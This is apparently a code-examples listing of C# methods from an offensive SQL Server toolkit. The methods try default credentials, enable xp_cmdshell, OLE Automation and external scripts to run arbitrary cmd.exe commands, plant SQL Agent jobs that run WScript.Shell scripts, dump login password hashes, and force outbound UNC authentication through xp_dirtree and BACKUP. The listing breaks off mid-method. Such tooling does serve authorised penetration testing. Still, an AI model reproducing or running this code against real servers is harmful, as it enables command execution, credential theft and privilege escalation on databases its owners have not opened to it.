Пример #1
0
        internal override bool Query()
        {
            using (SQLConnection sql = new SQLConnection(instance))
            {
                string   dbInstance = instance.Split(new string[] { @"\", @"," }, StringSplitOptions.RemoveEmptyEntries).LastOrDefault();
                string[] defaults   = logins.GetValues(dbInstance);
                if (0 == defaults.Length)
                {
                    return(false);
                }

                foreach (var d in defaults)
                {
                    Console.WriteLine(d);
                    string[]    userpass = d.Split('\0');
                    Credentials creds    = new Credentials(userpass[0], userpass[1]);
                    sql.BuildConnectionString(creds);
                    if (sql.Connect())
                    {
                        Console.WriteLine("[+] {0} : {1}:{2}", instance, creds.GetUsername(), creds.GetPassword());
                    }
                }
            }

            return(true);
        }
Пример #2
0
        internal void Query(string query)
        {
            if (!SQLSysadminCheck.Query(instance, computerName, credentials))
            {
                Console.WriteLine("[-] User is not SysAdmin");
                return;
            }
            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (!sql.Connect())
                {
                    return;
                }

                int sao_value = (int)_Query(sql, @"sp_configure 'Show Advanced Options'", "config_value");
                if (0 == sao_value)
                {
                    Console.WriteLine("{0} : Show Advanced Options is disabled, enabling.", instance);
                    _Query(sql, @"sp_configure 'Show Advanced Options',1;RECONFIGURE", string.Empty);
                }

                int xcs_value = (int)_Query(sql, @"sp_configure 'Ole Automation Procedures'", "config_value");
                if (0 == xcs_value)
                {
                    Console.WriteLine("{0} : Ole Automation Procedures is disabled, enabling.", instance);
                    _Query(sql, @"sp_configure 'Ole Automation Procedures',1;RECONFIGURE", string.Empty);
                }

                StringBuilder sb = new StringBuilder();
                sb.Append(QUERY1_1);
                sb.Append(string.Format("EXEC Sp_oamethod @shell, \'run\' , null, \'cmd.exe /c \"{0} > {1}\"\'", query, fileName));
                Console.WriteLine(App.DELIMITER);
                Console.WriteLine((string)_Query(sql, sb.ToString(), string.Empty));
                Console.WriteLine(App.DELIMITER);

                System.Threading.Thread.Sleep(1000);
                sb.Clear();
                sb.Append(QUERY2_1);
                sb.Append(string.Format("EXEC Sp_oamethod @fso, \'opentextfile\' , @file Out, \'{0}\', 1", fileName));
                sb.Append(QUERY2_3);
                sb.Append(string.Format("EXEC sp_oamethod @o, \'opentextfile\', @f out, \'{0}\', 1", fileName));
                sb.Append(QUERY2_5);
                Console.WriteLine((string)_Query(sql, sb.ToString(), "output"));

                sb.Clear();
                sb.Append(QUERY3_1);
                sb.Append(string.Format("EXEC Sp_oamethod @Shell, \'run\' , null, \'cmd.exe /c \"del {0}\"\' , \'0\' , \'true\'", fileName));
                Console.WriteLine((string)_Query(sql, sb.ToString(), string.Empty));

                if (0 == xcs_value && restoreState)
                {
                    _Query(sql, @"sp_configure 'Ole Automation Procedures',0;RECONFIGURE", string.Empty);
                }
                if (0 == sao_value && restoreState)
                {
                    _Query(sql, @"sp_configure 'Show Advanced Options',0;RECONFIGURE", string.Empty);
                }
            }
        }
Пример #3
0
        internal override bool Query()
        {
            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (!sql.Connect())
                {
                    return(false);
                }

                for (int i = start; i <= end; i++)
                {
                    string query1_1 = string.Format(
                        "SELECT \'{0}\' as [ComputerName],\n" +
                        "\'{1}\' as [Instance],\n" +
                        "\'{2}\' as [DatabaseId],\n" +
                        "DB_NAME({2}) as [DatabaseName]",
                        computerName, instance, i
                        );
#if DEBUG
                    Console.WriteLine(query1_1);
#endif
                    table = sql.Query(query1_1);

                    foreach (DataRow row in table.AsEnumerable())
                    {
                        try
                        {
                            Fuzz f = new Fuzz
                            {
                                ComputerName = computerName,
                                Instance     = instance,
                                DatabaseId   = (string)row["DatabaseId"],
                            };
                            if (!(row["DatabaseName"] is DBNull))
                            {
                                f.DatabaseName = (string)row["DatabaseName"];
                            }
#if DEBUG
                            Misc.PrintStruct <Fuzz>(f);
#endif
                            fuzzed.Add(f);
                        }
                        catch (Exception ex)
                        {
                            if (ex is ArgumentNullException)
                            {
                                continue;
                            }
                            else
                            {
                                Console.WriteLine(ex.Message);
                            }
                            return(false);
                        }
                    }
                }
            }
            return(true);
        }
Пример #4
0
        internal override bool Query()
        {
            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (!sql.Connect())
                {
                    return(false);
                }
#if DEBUG
                Console.WriteLine(QUERY1_1);
#endif
                foreach (DataRow r in sql.Query(QUERY1_1).AsEnumerable())
                {
                    _AddLink(r);
                }
#if DEBUG
                Console.WriteLine(QUERY2_1);
#endif
                sourceInstance = instance;
                foreach (DataRow r in sql.Query(QUERY2_1).AsEnumerable())
                {
#if DEBUG
                    Console.WriteLine((string)r["srvname"]);
#endif
                    _Query(sql, string.Empty, (string)r["srvname"], 0);
                }
            }
            return(true);
        }
Пример #5
0
        internal override bool Query()
        {
            string query1_1 = string.Format(
                "SELECT  \'{0}\' as [ComputerName],\n" +
                "\'{1}\' as [Instance],",
                computerName, instance
                );

            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (!sql.Connect())
                {
                    return(false);
                }

                StringBuilder sb = new StringBuilder();
                sb.Append(query1_1);
                sb.Append(QUERY1_2);
                if (!string.IsNullOrEmpty(linkNameFilter))
                {
                    sb.Append(linkNameFilter);
                }
#if DEBUG
                Console.WriteLine(sb.ToString());
#endif
                serverLinks = sql.Query <ServerLink>(sb.ToString(), new ServerLink());
                Console.WriteLine("Test");
            }
            return(true);
        }
Пример #6
0
        internal override bool Query()
        {
            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (!sql.Connect())
                {
                    return(false);
                }

                string query1_1 = string.Format("use [{0}];\n" +
                                                "SELECT \'{1}\' as [ComputerName],\n" +
                                                "\'{2}\' as [Instance],\n" +
                                                "\'{3}\' as [DatabaseName],\n",
                                                database, computerName, instance, database);

                StringBuilder sb = new StringBuilder();
                sb.Append(query1_1);
                sb.Append(QUERY1_2);
                if (!string.IsNullOrEmpty(procedureNameFilter))
                {
                    sb.Append(procedureNameFilter);
                }

#if DEBUG
                Console.WriteLine(sb.ToString());
#endif
                procedures = sql.Query <Procedure>(sb.ToString(), new Procedure());
            }
            return(true);
        }
Пример #7
0
        internal override bool Query()
        {
            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (!sql.Connect())
                {
                    return(false);
                }

                string query1_1 = string.Format(
                    "USE [{0}];" +
                    "SELECT  \'{0}\' as [ComputerName]," +
                    "\'{1}\' as [Instance],",
                    database, computerName, instance);

                StringBuilder sb = new StringBuilder();
                sb.Append(query1_1);
                sb.Append(QUERY1_2);
                sb.Append(autoExecFilter);
                sb.Append(procedureNameFilter);
                sb.Append(keywordFilter);
#if DEBUG
                Console.WriteLine(sb.ToString());
#endif
                files = sql.Query <AssemblyFiles>(sb.ToString(), new AssemblyFiles());
            }
            return(true);
        }
Пример #8
0
        internal override bool Query()
        {
            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (!sql.Connect())
                {
                    return(false);
                }

                StringBuilder sb = new StringBuilder();
                sb.Append(string.Format("USE {0};\n", database));
                sb.Append(string.Format("SELECT \'{0}\' as [ComputerName],\n", computerName));
                sb.Append(string.Format("\'{0}\' as [Instance],", instance));
                sb.Append(QUERY1_3);
                sb.Append(string.Format("FROM[{0}].[INFORMATION_SCHEMA].[TABLES]", database));
                if (!string.IsNullOrEmpty(tableFilter))
                {
                    sb.Append(tableFilter);
                }
                sb.Append(QUERY1_5);
#if DEBUG
                Console.WriteLine(sb.ToString());
#endif
                //table = sql.Query(sb.ToString());
                tables = sql.Query <Table>(sb.ToString(), new Table());
            }

            /*
             * foreach (DataRow row in table.AsEnumerable())
             * {
             *  try
             *  {
             *      Table t = new Table
             *      {
             *          ComputerName = (string)row["ComputerName"],
             *          Instance = (string)row["Instance"],
             *          DatabaseName = (string)row["DatabaseName"],
             *          SchemaName = (string)row["SchemaName"],
             *          TableName = (string)row["TableName"],
             *          TableType = (string)row["TableType"]
             *      };
             #if DEBUG
             *      Misc.PrintStruct<Table>(t);
             #endif
             *      tables.Add(t);
             *  }
             *  catch (Exception ex)
             *  {
             *      if (ex is ArgumentNullException)
             *          Console.WriteLine("Empty Response");
             *      else
             *          Console.WriteLine(ex);
             *      return false;
             *  }
             * }
             */
            return(true);
        }
Пример #9
0
        internal override bool Query()
        {
            string query1_1 = string.Format(
                "SELECT  \'{0}\' as [ComputerName],\n" +
                "\'{1}\' as [Instance],",
                computerName, instance);

            int versionShort = 0;

            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (!sql.Connect())
                {
                    return(false);
                }

                SQLServerInfo serverInfo = new SQLServerInfo(credentials);
                serverInfo.SetInstance(instance);
                if (!serverInfo.Query())
                {
                    return(false);
                }
                SQLServerInfo.Details details = serverInfo.GetResults();

                int.TryParse(details.SQLServerMajorVersion.Split('.').First(), out versionShort);

                StringBuilder sb = new StringBuilder();
                sb.Append(query1_1);
                sb.Append(query1_2);
                if (versionShort > 10)
                {
                    sb.Append(query1_3);
                }
                sb.Append(query1_4);

                if (!string.IsNullOrEmpty(databaseFilter))
                {
                    sb.Append(databaseFilter);
                }
                if (!string.IsNullOrEmpty(noDefaultsFilter))
                {
                    sb.Append(noDefaultsFilter);
                }
                if (!string.IsNullOrEmpty(hasAccessFilter))
                {
                    sb.Append(hasAccessFilter);
                }
                if (!string.IsNullOrEmpty(sysAdminFilter))
                {
                    sb.Append(sysAdminFilter);
                }
#if DEBUG
                Console.WriteLine(sb.ToString());
#endif
                databases = sql.Query <Database>(sb.ToString(), new Database());
            }
            return(true);
        }
Пример #10
0
        internal override bool Query()
        {
            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (!sql.Connect())
                {
                    return(false);
                }

                int sao_value = (int)_Query(sql, @"sp_configure 'Show Advanced Options'", "config_value");
                if (0 == sao_value)
                {
                    _Query(sql, @"sp_configure 'Show Advanced Options',1;RECONFIGURE", string.Empty);
                }

                //table = sql.Query("sp_configure");
                configs = sql.Query <Config>("sp_configure", new Config());

                if (0 == sao_value && restoreState)
                {
                    _Query(sql, @"sp_configure 'Show Advanced Options',0;RECONFIGURE", string.Empty);
                }
            }

            /*
             * foreach (DataRow row in table.AsEnumerable())
             * {
             *  try
             *  {
             *      Config c = new Config
             *      {
             *          ComputerName = computerName,
             *          Instance = instance,
             *          Name = (string)row["Name"],
             *          Minimum = (int)row["Minimum"],
             *          Maximum = (int)row["Maximum"],
             *          config_value = (int)row["config_value"],
             *          run_value = (int)row["run_value"]
             *      };
             #if DEBUG
             *      Misc.PrintStruct<Config>(c);
             #endif
             *      configs.Add(c);
             *  }
             *  catch (Exception ex)
             *  {
             *      if (ex is ArgumentNullException)
             *          Console.WriteLine("Empty Response");
             *      else
             *          Console.WriteLine(ex);
             *      return false;
             *  }
             * }
             */
            return(true);
        }
Пример #11
0
        internal void Query(string query)
        {
            if (!SQLSysadminCheck.Query(instance, computerName, credentials))
            {
                Console.WriteLine("[-] User is not SysAdmin");
                return;
            }
            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (!sql.Connect())
                {
                    return;
                }

                int sao_value = (int)_Query(sql, @"sp_configure 'Show Advanced Options'", "config_value");
                if (0 == sao_value)
                {
                    Console.WriteLine("{0} : Show Advanced Options is disabled, enabling.", instance);
                    _Query(sql, @"sp_configure 'Show Advanced Options',1;RECONFIGURE", string.Empty);
                }
                else
                {
                    Console.WriteLine("{0} : Show Advanced Options is enabled.", instance);
                }

                int xcs_value = (int)_Query(sql, @"sp_configure 'xp_cmdshell'", "config_value");
                if (0 == xcs_value)
                {
                    Console.WriteLine("{0} : xp_cmdshell is disabled, enabling.", instance);
                    _Query(sql, @"sp_configure 'xp_cmdshell',1;RECONFIGURE", string.Empty);
                }
                else
                {
                    Console.WriteLine("{0} : xp_cmdshell is enabled.", instance);
                }

                Console.WriteLine(App.DELIMITER);
                Console.WriteLine((string)_Query(sql, string.Format("EXEC master..xp_cmdshell \'{0}\'", query), "output"));
                Console.WriteLine(App.DELIMITER);

                if (0 == xcs_value && restoreState)
                {
                    Console.WriteLine("{0} : Disabling xp_cmdshell.", instance);
                    _Query(sql, @"sp_configure 'xp_cmdshell',0;RECONFIGURE", string.Empty);
                }

                if (0 == sao_value && restoreState)
                {
                    Console.WriteLine("{0} : Disabling Show Advanced Options.", instance);
                    _Query(sql, @"sp_configure 'Show Advanced Options',0;RECONFIGURE", string.Empty);
                }
            }
        }
Пример #12
0
 internal bool Query(string query)
 {
     using (SQLConnection sql = new SQLConnection(instance))
     {
         sql.BuildConnectionString(credentials);
         if (sql.Connect())
         {
             DataTable     table  = sql.Query(query);
             StringBuilder output = new StringBuilder();
             try
             {
                 foreach (DataRow row in table.AsEnumerable())
                 {
                     foreach (var col in row.ItemArray)
                     {
                         try
                         {
                             if (col is byte[])
                             {
                                 output.AppendFormat("{0}\n", BitConverter.ToString((byte[])col));
                             }
                             else
                             {
                                 output.AppendFormat("{0}\n", col);
                             }
                         }
                         catch (Exception ex)
                         {
                             Console.WriteLine(ex.Message);
                             continue;
                         }
                     }
                 }
                 Console.WriteLine(output.ToString());
             }
             catch (Exception ex)
             {
                 if (ex is ArgumentNullException)
                 {
                     Console.WriteLine("Empty Response");
                 }
                 else
                 {
                     Console.WriteLine(ex.Message);
                 }
                 return(false);
             }
         }
     }
     return(true);
 }
Пример #13
0
        internal override bool Query()
        {
            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (!sql.Connect())
                {
                    return(false);
                }

                oleProviders = sql.Query <OleProvider>(QUERY1_1, new OleProvider());
            }
            return(true);
        }
Пример #14
0
        internal override bool Query()
        {
            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (!sql.Connect())
                {
                    return(false);
                }

                string query1_1 = string.Format(
                    "USE {0};\n" +
                    "SELECT \'{1}\' as [ComputerName],\n" +
                    "\'{2}\' as [Instance],\n" +
                    "\'{0}\' as [DatabaseName],",
                    database, computerName, instance);

                string query1_3 = string.Format(
                    "FROM {0}.sys.database_principals rp \n" +
                    "INNER JOIN {0}.sys.database_permissions pm \n" +
                    "ON pm.grantee_principal_id = rp.principal_id \n" +
                    "LEFT JOIN {0}.sys.schemas ss \n" +
                    "ON pm.major_id = ss.schema_id \n" +
                    "LEFT JOIN {0}.sys.objects obj \n" +
                    "ON pm.[major_id] = obj.[object_id] WHERE 1 = 1",
                    database);

                StringBuilder sb = new StringBuilder();
                sb.Append(query1_1);
                sb.Append(QUERY1_2);
                sb.Append(query1_3);
                if (!string.IsNullOrEmpty(permissionNameFilter))
                {
                    sb.Append(permissionNameFilter);
                }
                if (!string.IsNullOrEmpty(principalNameFilter))
                {
                    sb.Append(principalNameFilter);
                }
                if (!string.IsNullOrEmpty(permissionTypeFilter))
                {
                    sb.Append(permissionTypeFilter);
                }
#if DEBUG
                Console.WriteLine(sb.ToString());
#endif
                databasePrivileges = sql.Query <DatabasePrivilege>(sb.ToString(), new DatabasePrivilege());
            }
            return(true);
        }
Пример #15
0
        internal void Query(string query)
        {
            if (!SQLSysadminCheck.Query(instance, computerName, credentials))
            {
                Console.WriteLine("[-] User is not SysAdmin");
                return;
            }
            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (!sql.Connect())
                {
                    return;
                }

                int sao_value = (int)_Query(sql, @"sp_configure 'Show Advanced Options'", "config_value");
                if (0 == sao_value)
                {
                    _Query(sql, @"sp_configure 'Show Advanced Options',1;RECONFIGURE", string.Empty);
                }

                int xcs_value = (int)_Query(sql, @"sp_configure 'external scripts enabled'", "config_value");
                if (0 == xcs_value)
                {
                    _Query(sql, @"sp_configure 'external scripts enabled',1;RECONFIGURE", string.Empty);
                }

                StringBuilder sb = new StringBuilder();
                sb.Append(QUERY1_1);
                sb.Append(string.Format("p = subprocess.Popen(\"cmd.exe /c {0}\", stdout=subprocess.PIPE)\n", query));
                sb.Append(QUERY1_3);
                sb.Append(QUERY1_4);
#if DEBUG
                Console.WriteLine(sb.ToString());
#endif
                Console.WriteLine(App.DELIMITER);
                Console.WriteLine((string)_Query(sql, sb.ToString(), "output"));
                Console.WriteLine(App.DELIMITER);

                if (0 == xcs_value && restoreState)
                {
                    _Query(sql, @"sp_configure 'external scripts enabled',0;RECONFIGURE", string.Empty);
                }
                if (0 == sao_value && restoreState)
                {
                    _Query(sql, @"sp_configure 'Show Advanced Options',0;RECONFIGURE", string.Empty);
                }
            }
        }
Пример #16
0
        internal static bool Query(string instance, string computerName, Credentials credentials)
        {
            string query = string.Format(
                "SELECT \'{0}\' as [ComputerName],\n" +
                "\'{1}\' as [Instance],\n" +
                "CASE\n" +
                "WHEN IS_SRVROLEMEMBER(\'sysadmin\') = 0 THEN \'No\'\n" +
                "ELSE \'Yes\'\n" +
                "END as IsSysadmin"
                , computerName, instance
                );

            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (!sql.Connect())
                {
                    return(false);
                }

                DataTable table = sql.Query(query);
                try
                {
                    foreach (DataRow row in table.AsEnumerable())
                    {
#if DEBUG
                        Console.WriteLine("{0}\t{1}\t{2}", row["Instance"].ToString(), row["Instance"].ToString(), row["IsSysadmin"].ToString());
#endif
                        return("Yes" == row["IsSysadmin"].ToString() ? true : false);
                    }
                }
                catch (Exception ex)
                {
                    if (ex is ArgumentNullException)
                    {
                        Console.WriteLine("Empty Response");
                    }
                    else
                    {
                        Console.WriteLine(ex.Message);
                    }
                    return(false);
                }
                return(false);
            }
        }
Пример #17
0
        internal override bool Query()
        {
            SQLServerInfo i = new SQLServerInfo(credentials);

            i.SetInstance(instance);
            i.Query();
            var info = i.GetResults();

            SetPermissionNameFilter("IMPERSONATE");
            base.Query();

            using (SQLConnection sql = new SQLConnection())
            {
                sql.BuildConnectionString(credentials);
                sql.Connect();
                foreach (var j in serverPrivileges)
                {
                    string query = string.Format("SELECT IS_SRVROLEMEMBER(\'sysadmin\', \'{0}\') as Status", j.ObjectName);
                    foreach (var r in sql.Query(query).AsEnumerable())
                    {
                        if (!(r["Status"] is DBNull) && 1 == (int)r["Status"])
                        {
                            var s = new Impersonate
                            {
                                ComputerName  = computerName,
                                Instance      = instance,
                                Vulnerability = "Excessive Privilege - Impersonate Login",
                                Description   = "The current SQL Server login can impersonate other logins.  This may allow an authenticated login to gain additional privileges.",
                                Remediation   = "Consider using an alterative to impersonation such as signed stored procedures. Impersonation is enabled using a command like: GRANT IMPERSONATE ON Login::sa to [user]. It can be removed using a command like: REVOKE IMPERSONATE ON Login::sa to [user]",
                                Severity      = "High",
                                IsVulnerable  = "Yes",
                                IsExploitable = "Unknown",
                                Exploited     = "No",
                                ExploitCmd    = "",
                                Reference     = @"https://msdn.microsoft.com/en-us/library/ms181362.aspx",
                                Details       = string.Format("{0} can impersonate the {1} SYSADMIN login. This test was ran with the {2} login.", j.GranteeName, j.ObjectName, info.Currentlogin)
                            };
                            impersonates.Add(s);
                        }
                    }
                }
            }
            return(true);
        }
Пример #18
0
        internal override bool Query()
        {
            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (!sql.Connect())
                {
                    return(false);
                }

                if (!SQLSysadminCheck.Query(instance, computerName, credentials))
                {
                    Console.WriteLine("[-] User is not Sysadmin");
                    return(false);
                }

                SQLServerInfo i = new SQLServerInfo(credentials);
                i.SetInstance(instance);
                i.Query();
                SQLServerInfo.Details d = i.GetResults();

                int versionShort;
                if (!int.TryParse(d.SQLServerMajorVersion.Split('.').First(), out versionShort))
                {
                    Console.WriteLine("[-] Unable to ascertain SQL Version");
                    Console.WriteLine("[*] It is possible to override this with the --version flag");
                    return(false);
                }

                string query = string.Empty;
                if (8 < versionShort)
                {
                    query = QUERY1_1;
                }
                else
                {
                    query = QUERY2_1;
                }

                //table = sql.Query(query);
                hashes = sql.Query <Hash>(query, new Hash());
            }
            return(false);
        }
Пример #19
0
        internal override bool Query()
        {
            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (sql.Connect())
                {
                    SQLServerInfo i = new SQLServerInfo(credentials);
                    i.SetInstance(instance);
                    i.Query();
                    SQLServerInfo.Details d = i.GetResults();

                    int versionShort;
                    if (!int.TryParse(d.SQLServerMajorVersion.Split('.').First(), out versionShort))
                    {
                        Console.WriteLine("[-] Unable to ascertain SQL Version");
                        Console.WriteLine("[*] It is possible to override this with the --version flag");
                        return(false);
                    }

                    string query1 = string.Empty;
                    string query2 = string.Empty;
                    if (11 > versionShort)
                    {
                        query1 = string.Format("BACKUP LOG [TESTING] TO DISK = \'{0}\'", uncpath);
                        query2 = string.Format("BACKUP DATABASE [TESTING] TO DISK = \'{0}\'", uncpath);
                    }
                    else
                    {
                        query1 = string.Format("xp_dirtree \'{0}\'", uncpath);
                        query2 = string.Format("xp_fileexist \'{0}\'", uncpath);
                    }

                    _Query(sql, query1);
                    _Query(sql, query2);
                }
            }
            return(true);
        }
Пример #20
0
        internal override bool Query()
        {
            string query1_1 = string.Format(
                "SELECT  \'{0}\' as [ComputerName],\n" +
                "\'{1}\' as [Instance],",
                computerName, instance
                );

            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (!sql.Connect())
                {
                    return(false);
                }
                StringBuilder sb = new StringBuilder();
                sb.Append(query1_1);
                sb.Append(QUERY1_2);
                if (!string.IsNullOrEmpty(auditNameFilter))
                {
                    sb.Append(auditNameFilter);
                }
                if (!string.IsNullOrEmpty(auditSpecificationFilter))
                {
                    sb.Append(auditSpecificationFilter);
                }
                if (!string.IsNullOrEmpty(auditActionNameFilter))
                {
                    sb.Append(auditActionNameFilter);
                }
#if DEBUG
                Console.WriteLine(sb.ToString());
#endif
                databaseSpecifications = sql.Query <DatabaseSpecification>(sb.ToString(), new DatabaseSpecification());
            }
            return(true);
        }
Пример #21
0
        internal void Query(string query)
        {
            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (!sql.Connect())
                {
                    return;
                }

                if (!_Check(sql))
                {
                    return;
                }

                string command     = string.Empty;
                string dbSubSystem = string.Empty;

                query = query.Replace("\'", "\'\'");

                string command_j = string.Format(
                    "function RunCmd()\n" +
                    "{\n" +
                    "var WshShell = new ActiveXObject(\"WScript.Shell\");\n" +
                    "var oExec = WshShell.Exec(\"{0}\");\n" +
                    "oExec = null;\n" +
                    "WshShell = null;\n" +
                    "}\n" +
                    "RunCmd();",
                    query
                    );

                string command_a = string.Format(
                    "Function Main()\n" +
                    "dim shell\n" +
                    "set shell = CreateObject(\"WScript.Shell\")\n" +
                    "shell.run(\"{0}\")\n" +
                    "set shell = nothing\n" +
                    "END Function",
                    query
                    );

                if (subsystem.ToLower() == "vbscript")
                {
                    command     = command_a;
                    dbSubSystem = "N\'VBScript\',";
                }
                else if (subsystem.ToLower() == "jscript")
                {
                    command     = command_j;
                    dbSubSystem = "N\'JavaScript\',";
                }
                else
                {
                    return;
                }

                string query1_1 = string.Format(
                    "USE msdb;\n" +
                    "EXECUTE dbo.sp_add_job\n" +
                    "@job_name = N\'powerupsql_job\'\n" +

                    "EXECUTE sp_add_jobstep\n" +
                    "@job_name = N\'powerupsql_job\',\n" +
                    "@step_name = N\'powerupsql_job_step\',\n" +
                    "@subsystem = N'ActiveScripting',\n" +
                    "@command = N\'{1}\',\n",
                    subsystem, command
                    );



                StringBuilder sb = new StringBuilder();
                sb.Append(query1_1);
                sb.Append(dbSubSystem);
                sb.Append(QUERY1_2);
#if DEBUG
                Console.WriteLine(sb.ToString());
#endif
                Console.WriteLine((string)_Query(sql, sb.ToString(), "output"));

                sb.Clear();
                sb.Append(QUERY2_1);
#if DEBUG
                Console.WriteLine(sb.ToString());
#endif
                Console.WriteLine(App.DELIMITER);
                Console.WriteLine((string)_Query(sql, sb.ToString(), "output"));
                Console.WriteLine(App.DELIMITER);

                sb.Clear();
                sb.Append(QUERY3_1);
#if DEBUG
                Console.WriteLine(sb.ToString());
#endif
                Console.WriteLine((string)_Query(sql, sb.ToString(), "output"));
            }
        }
Пример #22
0
        internal override bool Query()
        {
            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (!sql.Connect())
                {
                    return(false);
                }

                if (!_Check(sql))
                {
                    return(false);
                }

                StringBuilder sb = new StringBuilder();
                sb.Append(QUERY2_1);
                if (!string.IsNullOrEmpty(keywordFilter))
                {
                    sb.Append(keywordFilter);
                }
                if (!string.IsNullOrEmpty(subsystemFilter))
                {
                    sb.Append(subsystemFilter);
                }
                if (!string.IsNullOrEmpty(proxyCredFilter))
                {
                    sb.Append(proxyCredFilter);
                }
                if (!string.IsNullOrEmpty(usingProxyCredFilter))
                {
                    sb.Append(usingProxyCredFilter);
                }
                table = sql.Query(sb.ToString());
            }

            foreach (DataRow row in table.AsEnumerable())
            {
                try
                {
                    ServerJob sj = new ServerJob
                    {
                        ComputerName     = computerName,
                        Instance         = instance,
                        DatabaseName     = database,
                        Job_Id           = (int)row["Job_Id"],
                        Job_Name         = (string)row["Job_Name"],
                        Job_Description  = (string)row["Job_Description"],
                        Job_Owner        = (string)row["Job_Owner"],
                        Proxy_Id         = (int)row["Proxy_Id"],
                        Proxy_Credential = (string)row["Proxy_Credential"],
                        Date_Created     = (string)row["Date_Created"],
                        Last_Run_Date    = (DateTime)row["Last_Run_Date"],
                        Enabled          = (bool)row["Enabled"],
                        Server           = (string)row["Server"],
                        Step_Name        = (string)row["Step_Name"],
                        SubSystem        = (string)row["SubSystem"],
                        Command          = (string)row["Command"]
                    };
#if DEBUG
                    Misc.PrintStruct <ServerJob>(sj);
#endif
                    serverJobs.Add(sj);
                }
                catch (Exception ex)
                {
                    if (ex is ArgumentNullException)
                    {
                        Console.WriteLine("Empty Response");
                    }
                    else
                    {
                        Console.WriteLine(ex.Message);
                    }
                    return(false);
                }
            }
            return(true);
        }
Пример #23
0
        internal override bool Query()
        {
            bool isSysAdmin = false;

            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (!sql.Connect())
                {
                    return(false);
                }

                isSysAdmin = SQLSysadminCheck.Query(instance, computerName, credentials);

                StringBuilder sb = new StringBuilder();
                sb.Append(string.Format("USE master;\nSELECT  \'{0}\' as [ComputerName],\n\'{1}\' as [Instance],", computerName, instance));
                sb.Append(QUERY1_2);
                if (!string.IsNullOrEmpty(credentialFilter))
                {
                    sb.Append(credentialFilter);
                }
#if DEBUG
                Console.WriteLine(sb.ToString());
#endif
                //table = sql.Query(sb.ToString());
                serverCredentials = sql.Query <ServerCredential>(sb.ToString(), new ServerCredential());
            }

            /*
             * foreach (DataRow row in table.AsEnumerable())
             * {
             *  try
             *  {
             *      ServerCredential sc = new ServerCredential
             *      {
             *          ComputerName = (string)row["ComputerName"],
             *          Instance = (string)row["Instance"],
             *          credential_id = (int)row["credential_id"],
             *          CredentialName = (string)row["CredentialName"],
             *          credential_identity = (string)row["credential_identity"],
             *          create_date = (DateTime)row["create_date"],
             *          modify_date = (DateTime)row["modify_date"],
             *          target_type = (string)row["target_type"],
             *          target_id = (int)row["target_id"]
             *      };
             #if DEBUG
             *      Misc.PrintStruct<ServerCredential>(sc);
             #endif
             *      serverCredentials.Add(sc);
             *      return true;
             *  }
             *  catch (Exception ex)
             *  {
             *      if (ex is ArgumentNullException)
             *          Console.WriteLine("Empty Response");
             *      else
             *          Console.WriteLine(ex.Message);
             *      return false;
             *  }
             * }
             */
            return(false);
        }
Пример #24
0
        internal override bool Query()
        {
            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (!sql.Connect())
                {
                    return(false);
                }

                string query1_1 = string.Format(
                    "SELECT \'{0}\' as [ComputerName],\n" +
                    "\'{1}\' as [Instance],\n" +
                    "n as [PrincipalId],\n" +
                    "SUSER_NAME(n) as [PrincipleName]\n" +
                    "FROM(\n" +
                    "SELECT top {2} row_number() over(order by t1.number) as N\n" +
                    "FROM master..spt_values t1\n" +
                    "       cross join master..spt_values t2\n" +
                    ") a\n" +
                    "WHERE SUSER_NAME(n) is not null",
                    computerName, instance, end
                    );
#if DEBUG
                Console.WriteLine(query1_1);
#endif
                foreach (var row in sql.Query(query1_1).AsEnumerable())
                {
                    try
                    {
                        Fuzz f = new Fuzz
                        {
                            ComputerName = computerName,
                            Instance     = instance,
                            PrincipalId  = (long)row["PrincipalId"],
                        };

                        if (!(row["PrincipleName"] is DBNull))
                        {
                            f.PrincipleName = (string)row["PrincipleName"];
                            f.PrincipalType = string.Empty;
                            fuzzed.Add(f);
                        }
                        else
                        {
                            continue;
                        }
                    }
                    catch (Exception ex)
                    {
                        if (ex is ArgumentNullException)
                        {
                            continue;
                        }
                        else
                        {
                            Console.WriteLine(ex.Message);
                        }
                        return(false);
                    }
                }

                Fuzz[] arrFuzz = fuzzed.ToArray();
                for (int i = 0; i < fuzzed.Count; i++)
                {
                    string query2_1 = string.Format("EXEC master..sp_defaultdb \'{0}\', \'NOTAREALDATABASE1234ABCD\'", arrFuzz[i].PrincipleName);
                    try
                    {
                        using (SqlDataReader reader = new SqlCommand(query2_1, sql.GetSQL()).ExecuteReader()){ }
                    }
                    catch (Exception ex)
                    {
                        if (ex is SqlException)
                        {
                            if (ex.Message.Contains("NOTAREALDATABASE") || ex.Message.Contains("alter the login"))
                            {
                                if (arrFuzz[i].PrincipleName.Contains(@"\"))
                                {
                                    arrFuzz[i].PrincipalType = "Windows Account";
                                }
                                else
                                {
